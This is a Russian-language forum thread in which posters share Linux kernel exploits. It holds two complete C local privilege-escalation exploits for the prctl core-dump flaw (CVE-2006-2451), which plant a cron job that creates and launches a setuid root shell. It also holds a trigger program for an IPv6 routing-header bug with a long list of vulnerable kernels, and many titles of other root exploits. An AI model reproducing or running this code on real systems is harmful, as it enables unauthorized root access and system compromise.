Сообщений в теме: 22

[$iD]

/* Linux >= 2.6.13 prctl kernel exploit
*
* © Julien TINNES
*
* If you read the Changelog from 2.6.13 you've probably seen:
* [PATCH] setuid core dump
* 
* This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
* user setable argument to PR_SET_DUMPABLE.
* 
* This flaw allows us to create a root owned coredump into any directory.
* This is trivially exploitable.
*
*/

#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <time.h>

#define CROND "/etc/cron.d"
#define BUFSIZE 2048


struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

char crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";

char cronstring[BUFSIZE];
char fname[BUFSIZE];

struct timeval te;

void sh(int sn) {
execl(fname, fname, (char *) NULL);
}


int main(int argc, char *argv[]) {

int nw, pid;

if (geteuid() == 0) {
printf("[+] getting root shell\n");
setuid(0);
setgid(0);
if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
perror("[-] execle");
return 1;
}
}

printf("\nprctl() suidsafe exploit\n\n© Julien TINNES\n\n");

/* get our file name */
if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
perror("[-] readlink");
printf("This is not fatal, rewrite the exploit\n");
}

if (signal(SIGUSR1, sh) == SIG_ERR) {
perror("[-] signal");
return 1;
}
printf("[+] Installed signal handler\n");

/* Let us create core files */
setrlimit(RLIMIT_CORE, &myrlimit);
if (chdir(CROND) == -1) {
perror("[-] chdir");
return 1;
}

/* exploit the flaw */
if (prctl(PR_SET_DUMPABLE, 2) == -1) {
perror("[-] prtctl");
printf("Is you kernel version >= 2.6.13 ?\n");
return 1;
}

printf("[+] We are suidsafe dumpable!\n");

/* Forge the string for our core dump */
nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
if (nw >= sizeof(cronstring)) {
printf("[-] cronstring is too small\n");
return 1;
}
printf("[+] Malicious string forged\n");

if ((pid=fork()) == -1) {
perror("[-] fork");
return 1;
}

if (pid == 0) {
/* This is not the good way to do it  */
sleep(120);
exit(0);
}

/* SEGFAULT the child */
printf("[+] Segfaulting child\n");
if (kill(pid, 11) == -1) {
perror("[-] kill");
return 1;
}
if (gettimeofday(&te, NULL) == 0) 
printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
sleep(120);

printf("[-] It looks like the exploit failed\n");

return 1;
}

// milw0rm.com [2006-07-12]

[$iD]

/************************************************** ***/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/************************************************** ***/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * 
root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() { 
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");

corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);

printf("[*] Creating Cron entry\n");

if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}

kill(child, SIGSEGV);

printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);

printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -i");
}

[$iD]

Данная локальная уязвимость приводит к отказу приложения, лишая доступа других пользователей. Также возможно выполнить произвольный код с повышенными правами, но это еще не подтверждено.

Уязвимые версии:

Цитата

RedHat Enterprise Linux Desktop Workstation v. 5 client
RedHat Enterprise Linux Desktop v.5 client
RedHat Enterprise Linux v. 5 server
MandrakeSoft Linux Mandrake 2007.0 x86_64
MandrakeSoft Linux Mandrake 2007.0
Linux kernel 2.6.20
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.20
Linux kernel 2.6.19 1
Linux kernel 2.6.19 .2
Linux kernel 2.6.19 .1
Linux kernel 2.6.19 -rc4
Linux kernel 2.6.19 -rc3
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc2
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc1
Linux kernel 2.6.19
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.18 .4
Linux kernel 2.6.18 .3
Linux kernel 2.6.18 .1
Linux kernel 2.6.18
Linux kernel 2.6.17 .8
Linux kernel 2.6.17 .7
Linux kernel 2.6.17 .6
Linux kernel 2.6.17 .5
Linux kernel 2.6.17 .3
Linux kernel 2.6.17 .2
Linux kernel 2.6.17 .14
Linux kernel 2.6.17 .13
Linux kernel 2.6.17 .12
Linux kernel 2.6.17 .11
Linux kernel 2.6.17 .10
Linux kernel 2.6.17 .1
Linux kernel 2.6.17 -rc5
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.16 27
Linux kernel 2.6.16 13
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .7
Linux kernel 2.6.16 .23
Linux kernel 2.6.16 .19
Linux kernel 2.6.16 .12
Linux kernel 2.6.16 .11
Linux kernel 2.6.16 .1
Linux kernel 2.6.16 -rc1
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15 -rc3
Linux kernel 2.6.15 -rc2
Linux kernel 2.6.15 -rc1
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.15
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14 -rc4
Linux kernel 2.6.14 -rc3
Linux kernel 2.6.14 -rc2
Linux kernel 2.6.14 -rc1
Linux kernel 2.6.14
Linux kernel 2.6.14
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13 -rc7
Linux kernel 2.6.13 -rc6
Linux kernel 2.6.13 -rc4
Linux kernel 2.6.13 -rc1
Linux kernel 2.6.13
Linux kernel 2.6.13
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .22
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .12
Linux kernel 2.6.12 .1
Linux kernel 2.6.12 -rc5
Linux kernel 2.6.12 -rc4
Linux kernel 2.6.12 -rc1
Linux kernel 2.6.12
Linux kernel 2.6.12
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .4
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
Linux kernel 2.6.11
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
+ RedHat Fedora Core3
+ RedHat Fedora Core2
+ Trustix Secure Linux 3.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
Linux kernel 2.6.10
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.6.8.1
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.21-RC3
Linux kernel 2.6.20.3
Linux kernel 2.6.20.2
Linux kernel 2.6.20.1
Linux kernel 2.6.20-rc2
Linux kernel 2.6.18
Linux kernel 2.6.15.5
Linux kernel 2.6.15.11
Linux kernel 2.6.11.4

#include <netinet/in.h>

int main(int argc, char **argv) {
int s, optval;

s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
setsockopt(s, SOL_IPV6, IPV6_RTHDR, &optval, 0);

return 0;
}

[$iD]

]]>Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit]]>

]]>Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit]]>

[ghettobob]

why is linux such a complicated os (

[MrBonD]

ghettobob
May be it is.. but still it has lot's of opportunities that MS don't..

[###]

Linux Kernel < 2.6.29 exit_notify() Local Privilege Escalation Exploit

[###]

]]>Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit]]>

[###]

Linux Kernel 2.6.x SCTP FWD Memory Corruption Remote Exploit

[###]

Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit

[###]

Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit

[###]

Linux Kernel 2.6.29 ptrace_attach() Local Root Race Condition Exploit

[###]

Linux 2.6.30+/SELinux/RHEL5 Test Kernel Local Root Exploit 0day

[$iD]

Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit

[###]

Linux Kernel 2.6.x SCTP FWD Memory Corruption Remote Exploit

[###]

Linux Kernel 2.x sock_sendpage() Local Root Exploit #2

Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit

[###]

Linux Kernel < 2.6.30.5 cfg80211 Remote Denial of Service Exploit

[###]

Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)

[###]

Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure

[###]

Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit

[###]

Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)

Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit

[###]

Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [2]

[###]

Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]